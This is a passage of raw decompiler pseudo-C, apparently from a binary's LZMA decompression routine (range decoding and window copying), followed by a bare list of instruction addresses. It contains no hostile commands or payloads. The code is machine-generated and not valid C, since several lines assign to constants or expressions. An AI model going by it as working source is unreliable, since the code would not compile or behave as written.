												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406f9b
                                                    0x0040714a
                                                    0x00407160
                                                    0x00407168
                                                    0x0040716f
                                                    0x00407171
                                                    0x00407178
                                                    0x0040717c
                                                    0x0040717c
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x0040675e
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d7
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x00000000
                                                    0x004070c9
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00406f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
